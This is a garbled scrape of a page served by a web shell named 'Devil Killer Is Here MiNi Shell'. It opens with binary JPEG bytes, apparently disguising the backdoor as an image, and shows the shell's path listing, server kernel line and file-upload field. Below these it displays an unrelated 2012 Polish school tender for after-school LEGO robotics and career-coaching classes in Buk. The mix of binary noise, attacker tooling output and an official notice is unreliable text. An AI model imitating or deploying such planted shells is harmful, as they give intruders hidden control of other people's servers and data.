JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120207/36988-N-2012.html

<p class="kh_header"><b>Buk: Przeprowadzenie zajęć pozalekcyjnych kształtujących kompetencje kluczowe: matematyczne i podstawowe kompetencje naukowo-techniczne z wykorzystaniem metody dydaktycznej, polegającej na kształtowaniu tych kompetencji poprzez konstruowanie robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważne oraz przeprowadzenie zajęć z zakresu kształtowania wśród uczniów kompetencji inicjatywności i przedsiębiorczości z elementami doradztwa zawodowego</b><br>
<b>Numer ogłoszenia: 36988 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych w Buku , ul. Dworcowa 44, 64-320 Buk, woj. wielkopolskie, tel. 61 8301001, faks 61 8301167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspgbuk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół Ponadgimnazjalnych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć pozalekcyjnych kształtujących kompetencje kluczowe: matematyczne i podstawowe kompetencje naukowo-techniczne z wykorzystaniem metody dydaktycznej, polegającej na kształtowaniu tych kompetencji poprzez konstruowanie robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważne oraz przeprowadzenie zajęć z zakresu kształtowania wśród uczniów kompetencji inicjatywności i przedsiębiorczości z elementami doradztwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE I:
I.Przeprowadzenie zajęć pozalekcyjnych kształtujących kompetencje kluczowe: matematyczne i podstawowe kompetencje naukowo-techniczne z wykorzystaniem metody dydaktycznej, polegającej na kształtowaniu tych kompetencji poprzez konstruowanie robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważne dla 40 uczniów oraz przeprowadzenie szkoleń metodycznych dla 3 nauczycieli. Zadanie to jest integralną częścią projektu, pt. Jestem zawodowcem, (nr konkursu PO KL 9.2I1I11), zwanego dalej projektem realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Uczestnicy projektu - uczniowie - zostaną pogrupowani w 4 grupy zajęciowe (uczniowie klas II i III) Dla grupy przewidziano 1 kurs składający się z 12 zajęć po 135 minut każde ( 3 godz. lekcyjne) - łącznie dla jednej grupy - 36 godzin lekcyjnych. Łącznie dla wszystkich grup 144 godziny lekcyjne. Uczestnicy projektu - nauczyciele -  zostaną pogrupowani w 1 grupę (3 nauczycieli matematyki i fizyki). Dla grupy przewidziano  kurs na dwóch poziomach : I stopnia - 4 dni po 8 godzin oraz II stopnia - 4 dni po 8 godzin, łącznie dla grupy - 64 godziny lekcyjne. Łącznie dla wszystkich grup tj. dla uczniów i nauczycieli 208 godzin lekcyjnych.
Opis wymogów dotyczących programu zajęć : 
Program zajęć musi zostać napisany w języku polskim i przedłożony na piśmie. Program musi przedstawiać scenariusz. modelowego modułu kursu dla jednej grupy uczniów, tj. 12 zajęć po 135 minut każde - łącznie dla jednej grupy - 36 godzin lekcyjnych i dodatkowo wskazywać odrębnie elementy dostosowania go do potrzeb dydaktycznych i możliwości intelektualnych uczniów szkoły ponadgimnazjalnej kl. II i III. Program musi zakładać wykorzystanie podczas każdych z 12 zajęć edukacyjnych zestawów LEGO lub RoboRobo lub równoważnych oraz jasno określać sposób i cel ich każdorazowego wykorzystania podczas zajęć. Program może być dodatkowo przedstawiony w formie prezentacji elektronicznej. Program w wersji pisemnej musi być sporządzony wg następującego wzoru i  z zachowaniem następującego układu prezentacji treści:
PROGRAM
Ogólne założenia dydaktyczne.
CELE dydaktyczne.
Wykorzystane techniki i narzędzia nauczania.
Przewidywane rezultaty.
Scenariusz zajęć nr 1. 
Czas trwania: 135 minut. Uczestnicy: max. 12 osób. Prowadzący: minimum 2 instruktorów.
Narzędzia
Cel zajęć.
Wykorzystane techniki nauczania.
Wykorzystane zasoby techniczne.
Dostosowanie do potrzeb - wynikających z programu nauczania i poziomu edukacji na którym się znajdują i możliwości intelektualnych wynikających z ich wieku - uczestników zajęć.
Przewidywane rezultaty zajęć nr 1.
Dalej scenariusze zajęć 2-12 wg wzoru scenariusza nr 1
Przedstawiony wyżej wzór zawiera stałe, minimalnie wymagane elementy. Zamawiający w celu pełniejszego przedstawienia treści programu może dodać dodatkowe elementy pod warunkiem zachowania ww. minimum układu prezentacji programu.
Wykonawca musi przedłożyć Zamawiającemu PROGRAM ww. zajęć przygotowany w oparciu o zdefiniowane niniejszym, szczegółowe wytyczne dostosowany do wieku uczestników projektu, możliwy do zrealizowania w ramach przedstawionego trybu i okresu przeprowadzenia zajęć oraz z uwzględnieniem zasad zapewnienia zasobów technicznych, niezbędnych do przeprowadzenia zajęć.
Wykonawca musi przedłożyć Zamawiającemu wraz z programem proponowany (wstępny) harmonogram realizacji zadania (tzn. proponowane terminy przeprowadzenia zajęć z 4 grupami zajęciowymi. z uwzględnieniem, iż dla każdej grupy przewidziano 1 kurs składający się z 12 zajęć po 135 minut każde, a zajęcia muszą być zakończone w nieprzekraczalnym terminie do dnia 15 czerwca 2012 r.) Dokument ten będzie podstawą oceny wykonalności zadania przez Wykonawcę, a w konsekwencji wykonalności Projektu przez Zamawiającego i musi być zgodny z podanymi niżej szczegółowymi wytycznymi dot. konstruowania programu. Terminy podane w proponowanym harmonogramie (z wyłączeniem terminu zakończenia zajęć, tj. 15.06.2012r.) zostaną doprecyzowane w ostatecznym harmonogramie zajęć, który zostanie opracowany we współpracy Wykonawcy z Zamawiającym - po podpisaniu umowy.
Szczegółowe wytyczne dot. konstruowania programu: 
Program zajęć jednej grupy musi być rozłożony na 12 zajęć po 135 minut każde, zaplanowanych do przeprowadzenia w roku 2012 w okresie do dnia 15 czerwca 2012 r. i musi być tak skonstruowany, aby udział w zajęciach umożliwił uczestnikom  podniesienie poziomu wiedzy i umiejętności z zakresu kompetencji matematycznej i podstawowej kompetencji naukowo-technicznej (w rozumieniu zapisów dokumentu o nazwie: Zalecenia Parlamentu Europejskiego i Rady w sprawie kompetencji kluczowych w procesie uczenia się przez całe życie z dnia 18.12.2006 r.).
Program zajęć musi być skonstruowany w szczególności w ten sposób, by w swym zamierzeniu dydaktycznym (zdefiniowanym w: ogólnych założeniach dydaktycznych, celach dydaktycznych oraz w celach zdefiniowanych w scenariuszach każdego z 12 zajęć modułu modelowego) prowadził do wzrostu wśród uczestników zajęć wiedzy z zakresu przedmiotowej kompetencji kluczowej, a zwłaszcza: wiedzy z zakresu terminów i pojęć matematycznych,  wiedzy na temat sposobów prezentacji matematycznej, wiedzy na temat wpływu nauki i technologii na świat przyrody, wiedzy na temat zastosowania narzędzi i urządzeń technicznych, wiedzy na temat korzyści i zagrożeń wynikających z praktycznego zastosowania teorii naukowych oraz techniki.
Program zajęć oraz cele dydaktyczne muszą być dostosowane do poziomu wiedzy i umiejętności uczestników wynikającego z ich wieku i etapu edukacji, na którym się znajdują. Program musi być skonstruowany z uwzględnieniem poszanowania zasad polityk horyzontalnych Unii Europejskiej.
Program musi być zgodny z horyzontalną zasadą UE: zrównoważonego rozwoju, opisaną w Art. 17 Rozporządzenia Rady (WE) 1083I2006 dotyczącego Funduszy Strukturalnych i w swojej części dydaktycznej musi zawierać elementy informowania o znaczeniu poszanowania środowiska naturalnego dla dobra przyszłych pokoleń. 
Program musi być zgodny z horyzontalnymi zasadami UE równości i niedyskryminacji zawartymi w Art.16 Rozporządzenia Rady (WE) 1083I2006 dotyczącego Funduszy Strukturalnych.
Program powinien być opracowany w oparciu o wypracowane przez Wykonawcę dotychczasowe dobre praktyki (doświadczenie) prowadzenia zajęć tą metodą .
UCZESTNICY: W zajęciach będą uczestniczyć uczniowie klas II i III Zespołu Szkół Ponadgimnazjalnych Zasadniczej Szkoły Zawodowej w Buku. Rekrutacji uczestników dokona Zamawiający. Liczba uczestników: 40 uczniów ( 4 grupy).
Zamawiający zastrzega sobie prawo do zmniejszenia ilości osób w jednej grupie. Ilość grup nie może ulec zwiększeniu, a ilość osób łącznie nie może przekroczyć liczby 40 uczniów.
ORGANIZACJA ZAJĘĆ:
Zajęcia będą przeprowadzone w budynku szkoły mieszczącym się w Buku przy ul. Dworcowej 44, w salach wskazanych przez Dyrektora Szkoły. Szkoła udostępnią te pomieszczenia bezpłatnie. Zajęcia muszą zostać przeprowadzone w pełnym wymiarze dla każdej z grup.
Przewidywany termin rozpoczęcia zajęć: pierwsza grupa od 20.02.2012 r. Zakończenie zajęć grupy ostatniej do 15.06.2012 r.
Godziny zajęć muszą być zaplanowane w ten sposób, by rozpoczynały się nie wcześniej, niż o godzinie 13.00 i kończyły się nie później, niż o godz. 18.45.  Zajęcia muszą być przeprowadzane w dni robocze: od  poniedziałku do piątku. Nie jest dopuszczalne zaplanowanie zajęć w sobotę lub w niedzielę oraz w okresie wolnym od nauki zgodnie z zatwierdzonym planem organizacji roku szkolnego w województwie wielkopolskim w roku szkolnym 2011I2012. Jednocześnie Zamawiający zastrzega sobie możliwość zmiany w/w godzin, z przyczyn  wynikających z organizacji zajęć szkolnych w danej placówce szkolnej, lub planu zajęć uczestników projektu. Szczegółowy ostateczny harmonogram zajęć zostanie opracowany we współpracy Wykonawcy z Zamawiającym - po podpisaniu umowy. 
Uczestnicy mają pracować w dwuosobowych grupach, co zwiększy skuteczność nauczania.
Zajęcia z jedną grupą będą prowadzone każdorazowo przez przynajmniej 2 instruktorów.
Instruktorzy prowadzący zajęcia muszą być przeszkoleni przez Wykonawcę zajęć  w zakresie konstruowania robotów z edukacyjnej serii LEGO lub RoboRobo lub równoważnych. Muszą posiadać odpowiednie wykształcenie, doświadczenie w pracy instruktora robotyki informatyki oraz odbyli szkolenia z budowy i programowania robotów w certyfikowanej placówce spełniającej wymagania Research Society for Education of Inteligent Robot.
Program zajęć jednej grupy ma być podzielony na 12 zajęć po 135 minut. Program ten  należy zrealizować w okresie podanym powyżej,  w ramach 4 grup -  max. 12 osób w grupie.
Wykonawca zobowiązany będzie do przeprowadzenie testowania okresowego dla każdego uczestnika:  przed rozpoczęciem zajęć - oraz podczas dwukrotnej ewaluacji: po zajęciach nr 6 i po zajęciach nr 12.  Wykonawca w ramach niniejszego zamówienia sporządzi narzędzie badawcze wzrostu umiejętności uczestników w postaci testu kompetencyjnego (tj. pisemnego testu wyboru wraz z kluczem sprawdzającym).
Test kompetencyjny musi umożliwiać zbadanie wzrostu wiedzy uczestników projektu w następujących obszarach przedmiotowej kompetencji kluczowej: wiedzy z zakresu terminów i pojęć matematycznych,  wiedzy na temat sposobów prezentacji matematycznej, wiedzy na temat wpływu nauki i technologii na świat przyrody, wiedzy na temat zastosowania narzędzi i urządzeń technicznych, wiedzy na temat korzyści i zagrożeń wynikających z praktycznego zastosowania teorii naukowych oraz technik.
Wykonawca przeprowadzi testowanie okresowe w ten sposób, iż - w terminie oraz w sposób określony przez Koordynatora Projektu ze strony Zamawiającego - będzie dystrybuował oraz nadzorował wypełnienie arkuszy testowych przez uczestników projektu. Wypełnione arkusze przekaże Zamawiającemu, który dokona ich badania i oceny. 
Wykonawca zobowiąże instruktorów do prowadzenia dzienników zajęć - dostarczonych przez Zamawiającego i prowadzenia pełnej dokumentacji kursu. 
I.2. Ponadto w ramach wykonania zadania I Wykonawca musi dostarczyć (odpłatnie) zestawy do budowy i programowania robotów oraz gadżety motywujące dla uczniów.
Pojedynczy zestaw musi dawać możliwość zbudowania i zaprogramowania w pełni działających robotów. Jeden zestaw daje możliwość zbudowania co najmniej 20, znacząco różnych konstrukcji robotów, według załączonych z zestawem instrukcji.
I.2.1.Zestaw do budowy robota.
Ilość: 5 sztuk
Zestaw klocków do składania robotów (jeden zestaw) musi składać się z:
1.Zestawu LEGO Mindsotorms lub równoważnego
2.Miarki rozwijanej
3.Zestawu uzupełniającego
4.Dodatkowych czujników
5.Planszy do zadań
I.2.2. 
1.Lutownica, ilość: 3 sztuki
2.Przybory do lutowania, ilość: 3 sztuki
3.Maty, ilość: 3 sztuki
4.Sensor dalmierz ultradźwiękowy (2 rodzaje), ilość: 20 sztuk.
I.2.3.Gadżety motywujące - ilość 40 sztuk - to roboty edukacyjne HexBug Nano lub równoważne.

ZADANIE II:
Przeprowadzenie zajęć pozalekcyjnych z zakresu kształtowania wśród uczniów kompetencji inicjatywności i przedsiębiorczości z elementami doradztwa zawodowego. Zadanie to jest integralną częścią projektu, pt. Jestem zawodowcem, (nr konkursu PO KL 9.2I1I11), zwanego dalej projektem realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Ilość uczestników : 40 
Celem zajęć jest wzrost wiedzy i umiejętności uczniów m.in. planowania, organizowania, analizowania, komunikowania, sporządzania raportów, negocjacji, pracy indywidualnej, współpracy w zespołach, identyfikacji własnych mocnych i słabych stron. Spotkania z trenerem odbywać się będą w systemie spotkań indywidualnych i zbiorowym, w czasie pozalekcyjnym. 
Spotkania indywidualne każdy uczeń - 10 spotkań  po 1,5 godziny zegarowej, czyli łącznie 15 godzin na 1 ucznia. W trakcie ich trwania tworzone będą Indywidualne Plany Działania, w wyniku których nastąpi identyfikacja oczekiwań, określenie celów zawodowych, poznanie mocnych i słabych stron, wyznaczanie celów i podjęcie dalszych decyzji edukacyjnych i zawodowych przez każdego ucznia.
Łącznie 600 godzin spotkań indywidualnych.
Wykonawca musi opracować i przedłożyć Zamawiającemu PROGRAM (w tym szczegółowe scenariusze zajęć) zajęć  indywidualnych z zakresu kluczowych kompetencji inicjatywności i przedsiębiorczości oraz Indywidualne Plany Działania opracowane dla każdego ucznia.
Spotkania grupowe: zajęcia odbywać się będą w dwóch grupach, prowadzonych przez dwóch trenerów- specjalistów. Każda grupa - 10 spotkań po 2 godziny (razem 40 godzin spotkań grupowych).
Wykonawca musi opracować i przedłożyć Zamawiającemu PROGRAM zajęć grupowych (w tym szczegółowe scenariusze zajęć) z zakresu kluczowych kompetencji inicjatywności i przedsiębiorczości.
Łącznie 640 godzin spotkań indywidualnych i grupowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej lub czytelną kserokopię tego dokumentu potwierdzoną za zgodność z oryginałem przez uprawnionego przedstawiciela Wykonawcy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dokument może być również wystawiony w okresie wcześniejszym, jednak wówczas winien być potwierdzony przez organ wydający w wymaganym terminie tj. nie wcześniejszym niż 6 miesięcy): osoba fizyczna, która nie prowadzi działalności gospodarczej musi podać nr dowodu osobistego (a w przypadku jego braku inny dokument potwierdzający tożsamość) oraz organ, który  wydał w.w. dokument a także swój adres zamieszkania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla zadania nr I: wykaz wykonanych lub wykonywanych - min. 4 kursów,  z których każdy polegał na przeprowadzeniu zajęć pozalekcyjnych lub i pozaszkolnych w czasie jednego roku szkolnego (każdy kurs o długości łącznej, nie krótszej niż 18 godzin lekcyjnych) -z zakresu  techniki lub i informatyki, wykorzystujących konstruowanie robotów z edukacyjnej serii RoboRobo RoboKit lub równoważnych i programowanie w języku C, których uczestnikami byli uczniowie w wieku powyżej 12 lat , w grupach nie mniejszych niż 10 uczestników. - w okresie ostatnich dwóch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie.
(Przez kurs zajęć pozalekcyjnych pozaszkolnych Zamawiający rozumie zajęcia o charakterze edukacyjnym powiązane tematycznie oraz powiązane celem dydaktycznym i założonymi do osiągnięcia rezultatami. Są to zajęcia  dla tej samej grupy-stałej grupy uczestników, którzy zapisali się na dany kurs, uczęszczali na większość zajęć i ukończyli go. Są to zajęcia odbywające się w trakcie trwania roku szkolnego ( z wyłączeniem ferii zimowych i wakacji letnich). 
Pod pojęciem zajęcia pozalekcyjne i pozaszkolne Zamawiający rozumie zajęcia  odbywające się w szkole lub poza jej terenem w okresie roku szkolnego (z wyłączeniem okresu ferii zimowych i wakacji letnich), nie będące częścią obowiązkowego programu szkolnego, mające charakter fakultatywny, służące rozszerzaniu i pogłębianiu wiedzy oraz rozwijaniu zainteresowań uczniów.)
dla zadania nr II: doradca-trener musi spełniać warunki:
- wykształcenie wyższe magisterskie na kierunku: pedagogika
- minimum 10 letnie doświadczenie w pracy w szkole ponadgimnazjalnej, związanej z doradztwem zawodowym,
- doświadczenie w prowadzeniu zajęć z uczniami szkoły zawodowej,
- doświadczenie w prowadzeniu szkoleń grupowych oraz doradztwa indywidualnego z młodzieżą i osobami dorosłymi,
- doświadczenie w realizacji zadań w ramach projektów unijnych (minimum dwóch projektach),
- praca doradcza z kobietami, osobami starszymi oraz młodzieżą,
- doświadczenie w tworzeniu IPR (Indywidualnych Programów Rozwoju)
- doświadczenie doradcy zawodowego w pracy systemowej z klientem - minimum 5 letnie.
Spełnianie w.w. warunków musi być udokumentowane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">w celu potwierdzenia, że oferowany sprzęt odpowiada wymaganiom określonym przez zamawiającego, wykonawca jest zobowiązany do oferty dołączyć: - opis techniczny oferowanego sprzętu - wskazując markę, typ i model, dokumenty przedstawiające parametry techniczno-eksploatacyjne oferowanego sprzętu, aktualne certyfikaty bezpieczeństwa, informację o warunkach gwarancji</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
